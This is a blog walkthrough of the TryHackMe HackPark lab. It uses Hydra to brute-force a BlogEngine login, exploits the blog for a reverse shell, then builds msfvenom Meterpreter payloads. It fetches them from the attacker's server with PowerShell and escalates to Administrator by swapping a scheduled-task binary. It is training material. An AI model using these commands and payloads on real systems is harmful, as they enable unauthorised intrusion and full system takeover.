Skip to main content

TryHackMe - HackPark - Walkthrough

· 6 min read
Bryan Wendt
Security Enthusiast

This is a walkthrough for the TryHackMe room: HackPark. Let’s get started!

First step is to deploy the machine! NOTE: This machine took about 3 minutes to fully boot up for me.

Then navigate to the website:

h1

The picture is of a clown from a pretty famous movie. You could do a reverse image search on this if you don’t know the name, but I happen to know the name so I will just answer the question.

Using Hydra

If we read through the next section we are looking for a Login page. This can be found on the menu button in the top right, and clicking LOG-IN

We also need to figure out what type of request this form is making in order to answer the next question.

Let’s run hydra against the log-in page. First we need to gather some information:

Username: We will use admin in this case Wordlist: rockyou.txt URL: http://10.10.253.80/Account/login.aspx POST parameters: Let’s get these!

In order to get the POST parameters, let’s login with just admin and a random password. (I used test1). This will give use a POST request sent to the server. Now, let’s inspect the page.

First we need to go to Network, and click on the POST request. On the right-hand side, you will see Resend. Click on this and select Edit and Resend.

h2

From there, we can view the Request Body that is being sent to the server. Copy that whole thing and now we can configure our hydra attack.

h3

In this Request Body, we need to look for our admin and test1 login and password that we used. We will replace those with ^USER^ and ^PASS^, respectively. Lastly, we need something to tell hydra when a login attempt didn’t work. If we look at the login page when we tried to login previously, we see a “Login failed”. We can use that as our third parameter.

Advertisement

This hydra command is formatted like this:

hydra -l <user_we_want_to_use> -P <wordlist> <ip> <request_method> '<page_to_attack>:<request_body_to_send_with_parameters>:<failed_notification>'

Our hydra command will be something close to the following:

hydra -l admin -P ../rockyou.txt 10.10.253.80  http-post-form '/Account/login.aspx:__VIEWSTATE=I3MnpaPIRlkVeH4Kqrvda70AlTlHWpL7b8f3WLwFpdvduY8pg%2FR1KTlj85jTd1HyGNjf62TlDb63aZEhX60AcedUrAFssR0%2F2yq9HgfwhFkNK8lJzqzskyZ52KDSjg5gjbOhz3ke5TnvkzukBIkvgzGzGBqzkiyHRR8bZ6xWltRXOBkS8GomTXvkwVCTpWlKEypbzaZOWME%2BQjrbYQXOktLM8AMOV636Owd%2BwLD6NDYBZYiJs9fLFWVD%2F8GjdQdZukSWV3nPr9SEwGwLhqs%2BgOZT4H8p4SzdXk4sLahpDwygg1HKrbWh5We5Zepu9MRaR87i5pgDFuR0ZVo5QDECFRj%2BAVNQ9sjMu5FiqK62eNJAYEmp&__EVENTVALIDATION=EdyUhLFMjYGwbQuLybR9Bk4empok7oCUscNJn6WrxKizHeT7YhJHGNy%2BXB0Qoq8%2FhKHgGQRO24pmf81EejDPhbhuLgjZSExvSE6MGh4wBW9TEtIufI5vsgCmblpg5xNIcTRefmM%2BCGKT2V68xMx4RTUZ77NQy4gJmmc7GQj5GAckN12s&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed'

Letting hydra run, we get a successful attempt!

h4

Compromise the Machine

Now that we are logged in as admin. Navigate to Admin > About to find the version number.

From here we can go to Exploit Database to find an exploit! There are a few listed, but let’s use this one: Link. (Find the CVE here).

Now reading through the exploit, we need to upload it onto the server. The exploit states how to do this:

First, we set the TcpClient address and port within the method below to our .>attack host, who has a reverse tcp listener waiting for a connection. Next, we >upload this file through the file manager. In the current (3.3.6) version of >BlogEngine, this is done by editing a post and clicking on the icon that looks >like an open file in the toolbar. Note that this file must be uploaded as >PostView.ascx. Once uploaded, the file will be in the /App_Data/files directory >off of the document root. The admin page that allows upload is:

http://10.10.10.10/admin/app/editor/editpost.cshtml

Finally, the vulnerability is triggered by accessing the base URL for the blog >with a theme override specified like so:

http://10.10.10.10/?theme=../../App_Data/files

Let’s follow those instructions! First, copy the “raw” over to your attack machine. Make sure to change the IP to your attack machine IP. (tun0 if you run ip a or ifconfig). Also make sure to save the file as PostView.ascx.

Let’s go and upload the file. Navigate to Content > Posts > Select Post > Open Folder Icon > Select exploit file > Save

h5

Now let’s start a netcat listener for the shell to come back to. Open a new terminal windows on attack machine and type: nc -nvlp 4445

Navigate to the folder: http://10.10.253.80/?theme=../../App_Data/files

View your terminal, and we see a shell!

h6

Windows PrivEsc

Let’s generate a payload using msfvenom in order to get a meterpreter shell.

In a new terminal window generate the payload with the following command:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=<THM_ip> LPORT=4446 -f exe -o win_shell.exe

Once your payload is generated, we need to upload it. In the folder where you created your payload, open a Python http server with: python3 -m http.server 80

Back in the victim machine shell, use the following command to download the payload on to the server:

powershell -c "Invoke-WebRequest -Uri 'http://<thm_ip>:80/win_shell.exe' -OutFile 'c:\windows\temp\win_shell.exe'

Before we can execute the file, we need to have a listener open. For this we will use metasploit:

msfconsole
use exploit/multi/handler
set lhost tun0
set lport 4446
set payload windows/meterpreter/reverse_tcp
run

Now that our listener is running, execute the file: win_shell.exe

We have our meterpreter shell!

h7

Let’s gather info:

sysinfo (OS answer) ps (Abnormal service answer)

Navigate to C:\Program Files (x86)\SystemScheduler\Events to find the binary.

We found our binary, now lets create a payload under that binary:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=<thm_ip> LPORT=4447 -f exe -o Message.exe

Download that file onto the server using the same method we did previously:

powershell -c "Invoke-WebRequest -Uri 'http://<thm_ip>:80/Message.exe' -OutFile 'C:\Program Files (x86)\SystemScheduler\Message.exe'"

Once that is complete, background your current metasploit session, and set the multi/handler options to utilize the new port 4447. Once you run that, a session should come up.

getuid shows that we are now Administrator

h8

Let’s navigate to Jeff’s Desktop and get the flag!

h9

And then get the root flag:

h10

PrivEsc without Metasploit

This section I will leave for you to do by yourself. It is similar to the Metasploit, but instead of using Metasploit, you will use netcat listener to get the shell instead of the Metasploit multi/handler. The room does a good job of walking you through the process. You will also use winPEAS to enumerate the system.

Review This room was a more intermediate level room that still walked you through some steps, but not everything. I liked that it didn’t hand hold throughout the entire process, and it still left some research, previous knowledge up to the person doing it. Overall, it was a great room that I highly recommend!

References TryHackMe | HackPark Room | Exploit Database | Exploit | winPEAS